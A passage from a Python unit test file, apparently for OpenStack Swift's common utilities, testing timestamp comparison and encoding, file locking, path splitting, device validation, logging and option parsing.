self.assertTrue(timestamp > expected)
def test_float(self):
expected = 1402438115.91203
test_values = (
'1402438115.91203',
'1402438115.91203_00000000',
'1402438115.912030000',
'1402438115.912030000_0000000000000',
'000001402438115.912030000',
'000001402438115.912030000_0000000000',
1402438115.91203,
1402438115.9120300000000000,
1402438115.912029,
1402438115.912029999999999999,
utils.Timestamp(1402438115.91203),
utils.Timestamp(1402438115.91203, offset=0),
utils.Timestamp(1402438115.91203, offset=500),
utils.Timestamp(1402438115.912029),
utils.Timestamp(1402438115.91202999999999999, offset=0),
utils.Timestamp(1402438115.91202999999999999, offset=300),
utils.Timestamp('1402438115.91203'),
utils.Timestamp('1402438115.91203', offset=0),
utils.Timestamp('1402438115.91203', offset=400),
utils.Timestamp('1402438115.912029'),
utils.Timestamp('1402438115.912029', offset=0),
utils.Timestamp('1402438115.912029', offset=200),
utils.Timestamp('1402438115.912029999999999'),
utils.Timestamp('1402438115.912029999999999', offset=0),
utils.Timestamp('1402438115.912029999999999', offset=100),
)
tolerance = 0.00001
minimum = expected - tolerance
maximum = expected + tolerance
for value in test_values:
timestamp = utils.Timestamp(value)
self.assertTrue(float(timestamp) > minimum,
'%f is not bigger than %f given %r' % (
timestamp, minimum, value))
self.assertTrue(float(timestamp) < maximum,
'%f is not smaller than %f given %r' % (
timestamp, maximum, value))
# direct comparison of timestamp works too
self.assertTrue(timestamp > minimum,
'%s is not bigger than %f given %r' % (
timestamp.normal, minimum, value))
self.assertTrue(timestamp < maximum,
'%s is not smaller than %f given %r' % (
timestamp.normal, maximum, value))
# ... even against strings
self.assertTrue(timestamp > '%f' % minimum,
'%s is not bigger than %s given %r' % (
timestamp.normal, minimum, value))
self.assertTrue(timestamp < '%f' % maximum,
'%s is not smaller than %s given %r' % (
timestamp.normal, maximum, value))
def test_false(self):
self.assertFalse(utils.Timestamp(0))
self.assertFalse(utils.Timestamp(0, offset=0))
self.assertFalse(utils.Timestamp('0'))
self.assertFalse(utils.Timestamp('0', offset=0))
self.assertFalse(utils.Timestamp(0.0))
self.assertFalse(utils.Timestamp(0.0, offset=0))
self.assertFalse(utils.Timestamp('0.0'))
self.assertFalse(utils.Timestamp('0.0', offset=0))
self.assertFalse(utils.Timestamp(00000000.00000000))
self.assertFalse(utils.Timestamp(00000000.00000000, offset=0))
self.assertFalse(utils.Timestamp('00000000.00000000'))
self.assertFalse(utils.Timestamp('00000000.00000000', offset=0))
def test_true(self):
self.assertTrue(utils.Timestamp(1))
self.assertTrue(utils.Timestamp(1, offset=1))
self.assertTrue(utils.Timestamp(0, offset=1))
self.assertTrue(utils.Timestamp('1'))
self.assertTrue(utils.Timestamp('1', offset=1))
self.assertTrue(utils.Timestamp('0', offset=1))
self.assertTrue(utils.Timestamp(1.1))
self.assertTrue(utils.Timestamp(1.1, offset=1))
self.assertTrue(utils.Timestamp(0.0, offset=1))
self.assertTrue(utils.Timestamp('1.1'))
self.assertTrue(utils.Timestamp('1.1', offset=1))
self.assertTrue(utils.Timestamp('0.0', offset=1))
self.assertTrue(utils.Timestamp(11111111.11111111))
self.assertTrue(utils.Timestamp(11111111.11111111, offset=1))
self.assertTrue(utils.Timestamp(00000000.00000000, offset=1))
self.assertTrue(utils.Timestamp('11111111.11111111'))
self.assertTrue(utils.Timestamp('11111111.11111111', offset=1))
self.assertTrue(utils.Timestamp('00000000.00000000', offset=1))
def test_greater_no_offset(self):
now = time.time()
older = now - 1
timestamp = utils.Timestamp(now)
test_values = (
0, '0', 0.0, '0.0', '0000.0000', '000.000_000',
1, '1', 1.1, '1.1', '1111.1111', '111.111_111',
1402443112.213252, '1402443112.213252', '1402443112.213252_ffff',
older, '%f' % older, '%f_0000ffff' % older,
)
for value in test_values:
other = utils.Timestamp(value)
self.assertNotEqual(timestamp, other) # sanity
self.assertTrue(timestamp > value,
'%r is not greater than %r given %r' % (
timestamp, value, value))
self.assertTrue(timestamp > other,
'%r is not greater than %r given %r' % (
timestamp, other, value))
self.assertTrue(timestamp > other.normal,
'%r is not greater than %r given %r' % (
timestamp, other.normal, value))
self.assertTrue(timestamp > other.internal,
'%r is not greater than %r given %r' % (
timestamp, other.internal, value))
self.assertTrue(timestamp > float(other),
'%r is not greater than %r given %r' % (
timestamp, float(other), value))
self.assertTrue(timestamp > int(other),
'%r is not greater than %r given %r' % (
timestamp, int(other), value))
def test_greater_with_offset(self):
now = time.time()
older = now - 1
test_values = (
0, '0', 0.0, '0.0', '0000.0000', '000.000_000',
1, '1', 1.1, '1.1', '1111.1111', '111.111_111',
1402443346.935174, '1402443346.93517', '1402443346.935169_ffff',
older, '%f' % older, '%f_0000ffff' % older,
now, '%f' % now, '%f_00000000' % now,
)
for offset in range(1, 1000, 100):
timestamp = utils.Timestamp(now, offset=offset)
for value in test_values:
other = utils.Timestamp(value)
self.assertNotEqual(timestamp, other) # sanity
self.assertTrue(timestamp > value,
'%r is not greater than %r given %r' % (
timestamp, value, value))
self.assertTrue(timestamp > other,
'%r is not greater than %r given %r' % (
timestamp, other, value))
self.assertTrue(timestamp > other.normal,
'%r is not greater than %r given %r' % (
timestamp, other.normal, value))
self.assertTrue(timestamp > other.internal,
'%r is not greater than %r given %r' % (
timestamp, other.internal, value))
self.assertTrue(timestamp > float(other),
'%r is not greater than %r given %r' % (
timestamp, float(other), value))
self.assertTrue(timestamp > int(other),
'%r is not greater than %r given %r' % (
timestamp, int(other), value))
def test_smaller_no_offset(self):
now = time.time()
newer = now + 1
timestamp = utils.Timestamp(now)
test_values = (
9999999999.99999, '9999999999.99999', '9999999999.99999_ffff',
newer, '%f' % newer, '%f_0000ffff' % newer,
)
for value in test_values:
other = utils.Timestamp(value)
self.assertNotEqual(timestamp, other) # sanity
self.assertTrue(timestamp < value,
'%r is not smaller than %r given %r' % (
timestamp, value, value))
self.assertTrue(timestamp < other,
'%r is not smaller than %r given %r' % (
timestamp, other, value))
self.assertTrue(timestamp < other.normal,
'%r is not smaller than %r given %r' % (
timestamp, other.normal, value))
self.assertTrue(timestamp < other.internal,
'%r is not smaller than %r given %r' % (
timestamp, other.internal, value))
self.assertTrue(timestamp < float(other),
'%r is not smaller than %r given %r' % (
timestamp, float(other), value))
self.assertTrue(timestamp < int(other),
'%r is not smaller than %r given %r' % (
timestamp, int(other), value))
def test_smaller_with_offset(self):
now = time.time()
newer = now + 1
test_values = (
9999999999.99999, '9999999999.99999', '9999999999.99999_ffff',
newer, '%f' % newer, '%f_0000ffff' % newer,
)
for offset in range(1, 1000, 100):
timestamp = utils.Timestamp(now, offset=offset)
for value in test_values:
other = utils.Timestamp(value)
self.assertNotEqual(timestamp, other) # sanity
self.assertTrue(timestamp < value,
'%r is not smaller than %r given %r' % (
timestamp, value, value))
self.assertTrue(timestamp < other,
'%r is not smaller than %r given %r' % (
timestamp, other, value))
self.assertTrue(timestamp < other.normal,
'%r is not smaller than %r given %r' % (
timestamp, other.normal, value))
self.assertTrue(timestamp < other.internal,
'%r is not smaller than %r given %r' % (
timestamp, other.internal, value))
self.assertTrue(timestamp < float(other),
'%r is not smaller than %r given %r' % (
timestamp, float(other), value))
self.assertTrue(timestamp < int(other),
'%r is not smaller than %r given %r' % (
timestamp, int(other), value))
def test_cmp_with_none(self):
self.assertGreater(utils.Timestamp(0), None)
self.assertGreater(utils.Timestamp(1.0), None)
self.assertGreater(utils.Timestamp(1.0, 42), None)
def test_ordering(self):
given = [
'1402444820.62590_000000000000000a',
'1402444820.62589_0000000000000001',
'1402444821.52589_0000000000000004',
'1402444920.62589_0000000000000004',
'1402444821.62589_000000000000000a',
'1402444821.72589_000000000000000a',
'1402444920.62589_0000000000000002',
'1402444820.62589_0000000000000002',
'1402444820.62589_000000000000000a',
'1402444820.62590_0000000000000004',
'1402444920.62589_000000000000000a',
'1402444820.62590_0000000000000002',
'1402444821.52589_0000000000000002',
'1402444821.52589_0000000000000000',
'1402444920.62589',
'1402444821.62589_0000000000000004',
'1402444821.72589_0000000000000001',
'1402444820.62590',
'1402444820.62590_0000000000000001',
'1402444820.62589_0000000000000004',
'1402444821.72589_0000000000000000',
'1402444821.52589_000000000000000a',
'1402444821.72589_0000000000000004',
'1402444821.62589',
'1402444821.52589_0000000000000001',
'1402444821.62589_0000000000000001',
'1402444821.62589_0000000000000002',
'1402444821.72589_0000000000000002',
'1402444820.62589',
'1402444920.62589_0000000000000001']
expected = [
'1402444820.62589',
'1402444820.62589_0000000000000001',
'1402444820.62589_0000000000000002',
'1402444820.62589_0000000000000004',
'1402444820.62589_000000000000000a',
'1402444820.62590',
'1402444820.62590_0000000000000001',
'1402444820.62590_0000000000000002',
'1402444820.62590_0000000000000004',
'1402444820.62590_000000000000000a',
'1402444821.52589',
'1402444821.52589_0000000000000001',
'1402444821.52589_0000000000000002',
'1402444821.52589_0000000000000004',
'1402444821.52589_000000000000000a',
'1402444821.62589',
'1402444821.62589_0000000000000001',
'1402444821.62589_0000000000000002',
'1402444821.62589_0000000000000004',
'1402444821.62589_000000000000000a',
'1402444821.72589',
'1402444821.72589_0000000000000001',
'1402444821.72589_0000000000000002',
'1402444821.72589_0000000000000004',
'1402444821.72589_000000000000000a',
'1402444920.62589',
'1402444920.62589_0000000000000001',
'1402444920.62589_0000000000000002',
'1402444920.62589_0000000000000004',
'1402444920.62589_000000000000000a',
]
# less visual version
"""
now = time.time()
given = [
utils.Timestamp(now + i, offset=offset).internal
for i in (0, 0.00001, 0.9, 1.0, 1.1, 100.0)
for offset in (0, 1, 2, 4, 10)
]
expected = [t for t in given]
random.shuffle(given)
"""
self.assertEqual(len(given), len(expected)) # sanity
timestamps = [utils.Timestamp(t) for t in given]
# our expected values don't include insignificant offsets
with mock.patch('swift.common.utils.FORCE_INTERNAL', new=False):
self.assertEqual(
[t.internal for t in sorted(timestamps)], expected)
# string sorting works as well
self.assertEqual(
sorted([t.internal for t in timestamps]), expected)
def test_hashable(self):
ts_0 = utils.Timestamp('1402444821.72589')
ts_0_also = utils.Timestamp('1402444821.72589')
self.assertEqual(ts_0, ts_0_also) # sanity
self.assertEqual(hash(ts_0), hash(ts_0_also))
d = {ts_0: 'whatever'}
self.assertIn(ts_0, d) # sanity
self.assertIn(ts_0_also, d)
class TestTimestampEncoding(unittest.TestCase):
def setUp(self):
t0 = utils.Timestamp(0.0)
t1 = utils.Timestamp(997.9996)
t2 = utils.Timestamp(999)
t3 = utils.Timestamp(1000, 24)
t4 = utils.Timestamp(1001)
t5 = utils.Timestamp(1002.00040)
# encodings that are expected when explicit = False
self.non_explicit_encodings = (
('0000001000.00000_18', (t3, t3, t3)),
('0000001000.00000_18', (t3, t3, None)),
)
# mappings that are expected when explicit = True
self.explicit_encodings = (
('0000001000.00000_18+0+0', (t3, t3, t3)),
('0000001000.00000_18+0', (t3, t3, None)),
)
# mappings that are expected when explicit = True or False
self.encodings = (
('0000001000.00000_18+0+186a0', (t3, t3, t4)),
('0000001000.00000_18+186a0+186c8', (t3, t4, t5)),
('0000001000.00000_18-186a0+0', (t3, t2, t2)),
('0000001000.00000_18+0-186a0', (t3, t3, t2)),
('0000001000.00000_18-186a0-186c8', (t3, t2, t1)),
('0000001000.00000_18', (t3, None, None)),
('0000001000.00000_18+186a0', (t3, t4, None)),
('0000001000.00000_18-186a0', (t3, t2, None)),
('0000001000.00000_18', (t3, None, t1)),
('0000001000.00000_18-5f5e100', (t3, t0, None)),
('0000001000.00000_18+0-5f5e100', (t3, t3, t0)),
('0000001000.00000_18-5f5e100+5f45a60', (t3, t0, t2)),
)
# decodings that are expected when explicit = False
self.non_explicit_decodings = (
('0000001000.00000_18', (t3, t3, t3)),
('0000001000.00000_18+186a0', (t3, t4, t4)),
('0000001000.00000_18-186a0', (t3, t2, t2)),
('0000001000.00000_18+186a0', (t3, t4, t4)),
('0000001000.00000_18-186a0', (t3, t2, t2)),
('0000001000.00000_18-5f5e100', (t3, t0, t0)),
)
# decodings that are expected when explicit = True
self.explicit_decodings = (
('0000001000.00000_18+0+0', (t3, t3, t3)),
('0000001000.00000_18+0', (t3, t3, None)),
('0000001000.00000_18', (t3, None, None)),
('0000001000.00000_18+186a0', (t3, t4, None)),
('0000001000.00000_18-186a0', (t3, t2, None)),
('0000001000.00000_18-5f5e100', (t3, t0, None)),
)
# decodings that are expected when explicit = True or False
self.decodings = (
('0000001000.00000_18+0+186a0', (t3, t3, t4)),
('0000001000.00000_18+186a0+186c8', (t3, t4, t5)),
('0000001000.00000_18-186a0+0', (t3, t2, t2)),
('0000001000.00000_18+0-186a0', (t3, t3, t2)),
('0000001000.00000_18-186a0-186c8', (t3, t2, t1)),
('0000001000.00000_18-5f5e100+5f45a60', (t3, t0, t2)),
)
def _assertEqual(self, expected, actual, test):
self.assertEqual(expected, actual,
'Got %s but expected %s for parameters %s'
% (actual, expected, test))
def test_encoding(self):
for test in self.explicit_encodings:
actual = utils.encode_timestamps(test[1][0], test[1][1],
test[1][2], True)
self._assertEqual(test[0], actual, test[1])
for test in self.non_explicit_encodings:
actual = utils.encode_timestamps(test[1][0], test[1][1],
test[1][2], False)
self._assertEqual(test[0], actual, test[1])
for explicit in (True, False):
for test in self.encodings:
actual = utils.encode_timestamps(test[1][0], test[1][1],
test[1][2], explicit)
self._assertEqual(test[0], actual, test[1])
def test_decoding(self):
for test in self.explicit_decodings:
actual = utils.decode_timestamps(test[0], True)
self._assertEqual(test[1], actual, test[0])
for test in self.non_explicit_decodings:
actual = utils.decode_timestamps(test[0], False)
self._assertEqual(test[1], actual, test[0])
for explicit in (True, False):
for test in self.decodings:
actual = utils.decode_timestamps(test[0], explicit)
self._assertEqual(test[1], actual, test[0])
class TestUtils(unittest.TestCase):
"""Tests for swift.common.utils """
def setUp(self):
utils.HASH_PATH_SUFFIX = 'endcap'
utils.HASH_PATH_PREFIX = 'startcap'
def test_lock_path(self):
tmpdir = mkdtemp()
try:
with utils.lock_path(tmpdir, 0.1):
exc = None
success = False
try:
with utils.lock_path(tmpdir, 0.1):
success = True
except LockTimeout as err:
exc = err
self.assertTrue(exc is not None)
self.assertTrue(not success)
finally:
shutil.rmtree(tmpdir)
def test_lock_path_num_sleeps(self):
tmpdir = mkdtemp()
num_short_calls = [0]
exception_raised = [False]
def my_sleep(to_sleep):
if to_sleep == 0.01:
num_short_calls[0] += 1
else:
raise Exception('sleep time changed: %s' % to_sleep)
try:
with mock.patch('swift.common.utils.sleep', my_sleep):
with utils.lock_path(tmpdir):
with utils.lock_path(tmpdir):
pass
except Exception as e:
exception_raised[0] = True
self.assertTrue('sleep time changed' in str(e))
finally:
shutil.rmtree(tmpdir)
self.assertEqual(num_short_calls[0], 11)
self.assertTrue(exception_raised[0])
def test_lock_path_class(self):
tmpdir = mkdtemp()
try:
with utils.lock_path(tmpdir, 0.1, ReplicationLockTimeout):
exc = None
exc2 = None
success = False
try:
with utils.lock_path(tmpdir, 0.1, ReplicationLockTimeout):
success = True
except ReplicationLockTimeout as err:
exc = err
except LockTimeout as err:
exc2 = err
self.assertTrue(exc is not None)
self.assertTrue(exc2 is None)
self.assertTrue(not success)
exc = None
exc2 = None
success = False
try:
with utils.lock_path(tmpdir, 0.1):
success = True
except ReplicationLockTimeout as err:
exc = err
except LockTimeout as err:
exc2 = err
self.assertTrue(exc is None)
self.assertTrue(exc2 is not None)
self.assertTrue(not success)
finally:
shutil.rmtree(tmpdir)
def test_normalize_timestamp(self):
# Test swift.common.utils.normalize_timestamp
self.assertEqual(utils.normalize_timestamp('1253327593.48174'),
"1253327593.48174")
self.assertEqual(utils.normalize_timestamp(1253327593.48174),
"1253327593.48174")
self.assertEqual(utils.normalize_timestamp('1253327593.48'),
"1253327593.48000")
self.assertEqual(utils.normalize_timestamp(1253327593.48),
"1253327593.48000")
self.assertEqual(utils.normalize_timestamp('253327593.48'),
"0253327593.48000")
self.assertEqual(utils.normalize_timestamp(253327593.48),
"0253327593.48000")
self.assertEqual(utils.normalize_timestamp('1253327593'),
"1253327593.00000")
self.assertEqual(utils.normalize_timestamp(1253327593),
"1253327593.00000")
self.assertRaises(ValueError, utils.normalize_timestamp, '')
self.assertRaises(ValueError, utils.normalize_timestamp, 'abc')
def test_normalize_delete_at_timestamp(self):
self.assertEqual(
utils.normalize_delete_at_timestamp(1253327593),
'1253327593')
self.assertEqual(
utils.normalize_delete_at_timestamp(1253327593.67890),
'1253327593')
self.assertEqual(
utils.normalize_delete_at_timestamp('1253327593'),
'1253327593')
self.assertEqual(
utils.normalize_delete_at_timestamp('1253327593.67890'),
'1253327593')
self.assertEqual(
utils.normalize_delete_at_timestamp(-1253327593),
'0000000000')
self.assertEqual(
utils.normalize_delete_at_timestamp(-1253327593.67890),
'0000000000')
self.assertEqual(
utils.normalize_delete_at_timestamp('-1253327593'),
'0000000000')
self.assertEqual(
utils.normalize_delete_at_timestamp('-1253327593.67890'),
'0000000000')
self.assertEqual(
utils.normalize_delete_at_timestamp(71253327593),
'9999999999')
self.assertEqual(
utils.normalize_delete_at_timestamp(71253327593.67890),
'9999999999')
self.assertEqual(
utils.normalize_delete_at_timestamp('71253327593'),
'9999999999')
self.assertEqual(
utils.normalize_delete_at_timestamp('71253327593.67890'),
'9999999999')
self.assertRaises(ValueError, utils.normalize_timestamp, '')
self.assertRaises(ValueError, utils.normalize_timestamp, 'abc')
def test_last_modified_date_to_timestamp(self):
expectations = {
'1970-01-01T00:00:00.000000': 0.0,
'2014-02-28T23:22:36.698390': 1393629756.698390,
'2011-03-19T04:03:00.604554': 1300507380.604554,
}
for last_modified, ts in expectations.items():
real = utils.last_modified_date_to_timestamp(last_modified)
self.assertEqual(real, ts, "failed for %s" % last_modified)
def test_last_modified_date_to_timestamp_when_system_not_UTC(self):
try:
old_tz = os.environ.get('TZ')
# Western Argentina Summer Time. Found in glibc manual; this
# timezone always has a non-zero offset from UTC, so this test is
# always meaningful.
os.environ['TZ'] = 'WART4WARST,J1/0,J365/25'
self.assertEqual(utils.last_modified_date_to_timestamp(
'1970-01-01T00:00:00.000000'),
0.0)
finally:
if old_tz is not None:
os.environ['TZ'] = old_tz
else:
os.environ.pop('TZ')
def test_backwards(self):
# Test swift.common.utils.backward
# The lines are designed so that the function would encounter
# all of the boundary conditions and typical conditions.
# Block boundaries are marked with '<>' characters
blocksize = 25
lines = [b'123456789x12345678><123456789\n', # block larger than rest
b'123456789x123>\n', # block ends just before \n character
b'123423456789\n',
b'123456789x\n', # block ends at the end of line
b'<123456789x123456789x123\n',
b'<6789x123\n', # block ends at the beginning of the line
b'6789x1234\n',
b'1234><234\n', # block ends typically in the middle of line
b'123456789x123456789\n']
with TemporaryFile() as f:
for line in lines:
f.write(line)
count = len(lines) - 1
for line in utils.backward(f, blocksize):
self.assertEqual(line, lines[count].split(b'\n')[0])
count -= 1
# Empty file case
with TemporaryFile('r') as f:
self.assertEqual([], list(utils.backward(f)))
def test_mkdirs(self):
testdir_base = mkdtemp()
testroot = os.path.join(testdir_base, 'mkdirs')
try:
self.assertTrue(not os.path.exists(testroot))
utils.mkdirs(testroot)
self.assertTrue(os.path.exists(testroot))
utils.mkdirs(testroot)
self.assertTrue(os.path.exists(testroot))
rmtree(testroot, ignore_errors=1)
testdir = os.path.join(testroot, 'one/two/three')
self.assertTrue(not os.path.exists(testdir))
utils.mkdirs(testdir)
self.assertTrue(os.path.exists(testdir))
utils.mkdirs(testdir)
self.assertTrue(os.path.exists(testdir))
rmtree(testroot, ignore_errors=1)
open(testroot, 'wb').close()
self.assertTrue(not os.path.exists(testdir))
self.assertRaises(OSError, utils.mkdirs, testdir)
os.unlink(testroot)
finally:
rmtree(testdir_base)
def test_split_path(self):
# Test swift.common.utils.split_account_path
self.assertRaises(ValueError, utils.split_path, '')
self.assertRaises(ValueError, utils.split_path, '/')
self.assertRaises(ValueError, utils.split_path, '//')
self.assertEqual(utils.split_path('/a'), ['a'])
self.assertRaises(ValueError, utils.split_path, '//a')
self.assertEqual(utils.split_path('/a/'), ['a'])
self.assertRaises(ValueError, utils.split_path, '/a/c')
self.assertRaises(ValueError, utils.split_path, '//c')
self.assertRaises(ValueError, utils.split_path, '/a/c/')
self.assertRaises(ValueError, utils.split_path, '/a//')
self.assertRaises(ValueError, utils.split_path, '/a', 2)
self.assertRaises(ValueError, utils.split_path, '/a', 2, 3)
self.assertRaises(ValueError, utils.split_path, '/a', 2, 3, True)
self.assertEqual(utils.split_path('/a/c', 2), ['a', 'c'])
self.assertEqual(utils.split_path('/a/c/o', 3), ['a', 'c', 'o'])
self.assertRaises(ValueError, utils.split_path, '/a/c/o/r', 3, 3)
self.assertEqual(utils.split_path('/a/c/o/r', 3, 3, True),
['a', 'c', 'o/r'])
self.assertEqual(utils.split_path('/a/c', 2, 3, True),
['a', 'c', None])
self.assertRaises(ValueError, utils.split_path, '/a', 5, 4)
self.assertEqual(utils.split_path('/a/c/', 2), ['a', 'c'])
self.assertEqual(utils.split_path('/a/c/', 2, 3), ['a', 'c', ''])
try:
utils.split_path('o\nn e', 2)
except ValueError as err:
self.assertEqual(str(err), 'Invalid path: o%0An%20e')
try:
utils.split_path('o\nn e', 2, 3, True)
except ValueError as err:
self.assertEqual(str(err), 'Invalid path: o%0An%20e')
def test_validate_device_partition(self):
# Test swift.common.utils.validate_device_partition
utils.validate_device_partition('foo', 'bar')
self.assertRaises(ValueError,
utils.validate_device_partition, '', '')
self.assertRaises(ValueError,
utils.validate_device_partition, '', 'foo')
self.assertRaises(ValueError,
utils.validate_device_partition, 'foo', '')
self.assertRaises(ValueError,
utils.validate_device_partition, 'foo/bar', 'foo')
self.assertRaises(ValueError,
utils.validate_device_partition, 'foo', 'foo/bar')
self.assertRaises(ValueError,
utils.validate_device_partition, '.', 'foo')
self.assertRaises(ValueError,
utils.validate_device_partition, '..', 'foo')
self.assertRaises(ValueError,
utils.validate_device_partition, 'foo', '.')
self.assertRaises(ValueError,
utils.validate_device_partition, 'foo', '..')
try:
utils.validate_device_partition('o\nn e', 'foo')
except ValueError as err:
self.assertEqual(str(err), 'Invalid device: o%0An%20e')
try:
utils.validate_device_partition('foo', 'o\nn e')
except ValueError as err:
self.assertEqual(str(err), 'Invalid partition: o%0An%20e')
def test_NullLogger(self):
# Test swift.common.utils.NullLogger
sio = StringIO()
nl = utils.NullLogger()
nl.write('test')
self.assertEqual(sio.getvalue(), '')
def test_LoggerFileObject(self):
orig_stdout = sys.stdout
orig_stderr = sys.stderr
sio = StringIO()
handler = logging.StreamHandler(sio)
logger = logging.getLogger()
logger.addHandler(handler)
lfo_stdout = utils.LoggerFileObject(logger)
lfo_stderr = utils.LoggerFileObject(logger)
lfo_stderr = utils.LoggerFileObject(logger, 'STDERR')
print('test1')
self.assertEqual(sio.getvalue(), '')
sys.stdout = lfo_stdout
print('test2')
self.assertEqual(sio.getvalue(), 'STDOUT: test2\n')
sys.stderr = lfo_stderr
print('test4', file=sys.stderr)
self.assertEqual(sio.getvalue(), 'STDOUT: test2\nSTDERR: test4\n')
sys.stdout = orig_stdout
print('test5')
self.assertEqual(sio.getvalue(), 'STDOUT: test2\nSTDERR: test4\n')
print('test6', file=sys.stderr)
self.assertEqual(sio.getvalue(), 'STDOUT: test2\nSTDERR: test4\n'
'STDERR: test6\n')
sys.stderr = orig_stderr
print('test8')
self.assertEqual(sio.getvalue(), 'STDOUT: test2\nSTDERR: test4\n'
'STDERR: test6\n')
lfo_stdout.writelines(['a', 'b', 'c'])
self.assertEqual(sio.getvalue(), 'STDOUT: test2\nSTDERR: test4\n'
'STDERR: test6\nSTDOUT: a#012b#012c\n')
lfo_stdout.close()
lfo_stderr.close()
lfo_stdout.write('d')
self.assertEqual(sio.getvalue(), 'STDOUT: test2\nSTDERR: test4\n'
'STDERR: test6\nSTDOUT: a#012b#012c\nSTDOUT: d\n')
lfo_stdout.flush()
self.assertEqual(sio.getvalue(), 'STDOUT: test2\nSTDERR: test4\n'
'STDERR: test6\nSTDOUT: a#012b#012c\nSTDOUT: d\n')
for lfo in (lfo_stdout, lfo_stderr):
got_exc = False
try:
for line in lfo:
pass
except Exception:
got_exc = True
self.assertTrue(got_exc)
got_exc = False
try:
for line in lfo:
pass
except Exception:
got_exc = True
self.assertTrue(got_exc)
self.assertRaises(IOError, lfo.read)
self.assertRaises(IOError, lfo.read, 1024)
self.assertRaises(IOError, lfo.readline)
self.assertRaises(IOError, lfo.readline, 1024)
lfo.tell()
def test_LoggerFileObject_recursion(self):
crashy_calls = [0]
class CrashyLogger(logging.Handler):
def emit(self, record):
crashy_calls[0] += 1
try:
# Pretend to be trying to send to syslog, but syslogd is
# dead. We need the raise here to set sys.exc_info.
raise socket.error(errno.ENOTCONN, "This is an ex-syslog")
except socket.error:
self.handleError(record)
logger = logging.getLogger()
logger.addHandler(CrashyLogger())
# Set up some real file descriptors for stdio. If you run
# nosetests with "-s", you already have real files there, but
# otherwise they're StringIO objects.
#
# In any case, since capture_stdio() closes sys.stdin and friends,
# we'd want to set up some sacrificial files so as to not goof up
# the testrunner.
new_stdin = open(os.devnull, 'r+b')
new_stdout = open(os.devnull, 'w+b')
new_stderr = open(os.devnull, 'w+b')
with contextlib.closing(new_stdin), contextlib.closing(new_stdout), \
contextlib.closing(new_stderr):
# logging.raiseExceptions is set to False in test/__init__.py, but
# is True in Swift daemons, and the error doesn't manifest without
# it.
with mock.patch('sys.stdin', new_stdin), \
mock.patch('sys.stdout', new_stdout), \
mock.patch('sys.stderr', new_stderr), \
mock.patch.object(logging, 'raiseExceptions', True):
# Note: since stdio is hooked up to /dev/null in here, using
# pdb is basically impossible. Sorry about that.
utils.capture_stdio(logger)
logger.info("I like ham")
self.assertTrue(crashy_calls[0], 1)
def test_parse_options(self):
# Get a file that is definitely on disk
with NamedTemporaryFile() as f:
conf_file = f.name
conf, options = utils.parse_options(test_args=[conf_file])
self.assertEqual(conf, conf_file)
# assert defaults
self.assertEqual(options['verbose'], False)
self.assertTrue('once' not in options)
# assert verbose as option
conf, options = utils.parse_options(test_args=[conf_file, '-v'])
self.assertEqual(options['verbose'], True)
# check once option
conf, options = utils.parse_options(test_args=[conf_file],
once=True)
self.assertEqual(options['once'], False)
test_args = [conf_file, '--once']
conf, options = utils.parse_options(test_args=test_args, once=True)
self.assertEqual(options['once'], True)
# check options as arg parsing
test_args = [conf_file, 'once', 'plugin_name', 'verbose']
conf, options = utils.parse_options(test_args=test_args, once=True)
self.assertEqual(options['verbose'], True)
self.assertEqual(options['once'], True)
self.assertEqual(options['extra_args'], ['plugin_name'])
def test_parse_options_errors(self):
orig_stdout = sys.stdout
orig_stderr = sys.stderr
stdo = StringIO()
stde = StringIO()
utils.sys.stdout = stdo
utils.sys.stderr = stde
self.assertRaises(SystemExit, utils.parse_options, once=True,
test_args=[])
self.assertTrue('missing config' in stdo.getvalue())
# verify conf file must exist, context manager will delete temp file
with NamedTemporaryFile() as f:
conf_file = f.name
self.assertRaises(SystemExit, utils.parse_options, once=True,
test_args=[conf_file])
self.assertTrue('unable to locate' in stdo.getvalue())
# reset stdio
utils.sys.stdout = orig_stdout
utils.sys.stderr = orig_stderr
def test_dump_recon_cache(self):
testdir_base = mkdtemp()
testcache_file = os.path.join(testdir_base, 'cache.recon')
logger = utils.get_logger(None, 'server', log_route='server')
try:
submit_dict = {'key1': {'value1': 1, 'value2': 2}}
utils.dump_recon_cache(submit_dict, testcache_file, logger)
fd = open(testcache_file)
file_dict = json.loads(fd.readline())
fd.close()
self.assertEqual(submit_dict, file_dict)
# Use a nested entry
submit_dict = {'key1': {'key2': {'value1': 1, 'value2': 2}}}
result_dict = {'key1': {'key2': {'value1': 1, 'value2': 2},
'value1': 1, 'value2': 2}}
utils.dump_recon_cache(submit_dict, testcache_file, logger)
fd = open(testcache_file)
file_dict = json.loads(fd.readline())
fd.close()
self.assertEqual(result_dict, file_dict)
finally:
rmtree(testdir_base)
def test_dump_recon_cache_permission_denied(self):
testdir_base = mkdtemp()
testcache_file = os.path.join(testdir_base, 'cache.recon')
class MockLogger(object):
def __init__(self):
self._excs = []
def exception(self, message):
_junk, exc, _junk = sys.exc_info()
self._excs.append(exc)
logger = MockLogger()
try:
submit_dict = {'key1': {'value1': 1, 'value2': 2}}
with mock.patch(
'swift.common.utils.NamedTemporaryFile',
side_effect=IOError(13, 'Permission Denied')):
utils.dump_recon_cache(submit_dict, testcache_file, logger)
self.assertIsInstance(logger._excs[0], IOError)
finally:
rmtree(testdir_base)
def test_get_logger(self):
sio = StringIO()
logger = logging.getLogger('server')
logger.addHandler(logging.StreamHandler(sio))
logger = utils.get_logger(None, 'server', log_route='server')
logger.warning('test1')
self.assertEqual(sio.getvalue(), 'test1\n')
logger.debug('test2')
self.assertEqual(sio.getvalue(), 'test1\n')
logger = utils.get_logger({'log_level': 'DEBUG'}, 'server',
log_route='server')
logger.debug('test3')
self.assertEqual(sio.getvalue(), 'test1\ntest3\n')
# Doesn't really test that the log facility is truly being used all the
# way to syslog; but exercises the code.
logger = utils.get_logger({'log_facility': 'LOG_LOCAL3'}, 'server',
log_route='server')
logger.warning('test4')
self.assertEqual(sio.getvalue(),
'test1\ntest3\ntest4\n')
# make sure debug doesn't log by default
logger.debug('test5')
self.assertEqual(sio.getvalue(),
'test1\ntest3\ntest4\n')
# make sure notice lvl logs by default
logger.notice('test6')
self.assertEqual(sio.getvalue(),
'test1\ntest3\ntest4\ntest6\n')
def test_get_logger_sysloghandler_plumbing(self):
orig_sysloghandler = utils.SysLogHandler
syslog_handler_args = []
def syslog_handler_catcher(*args, **kwargs):
syslog_handler_args.append((args, kwargs))
return orig_sysloghandler(*args, **kwargs)
syslog_handler_catcher.LOG_LOCAL0 = orig_sysloghandler.LOG_LOCAL0
syslog_handler_catcher.LOG_LOCAL3 = orig_sysloghandler.LOG_LOCAL3
try:
utils.SysLogHandler = syslog_handler_catcher
utils.get_logger({
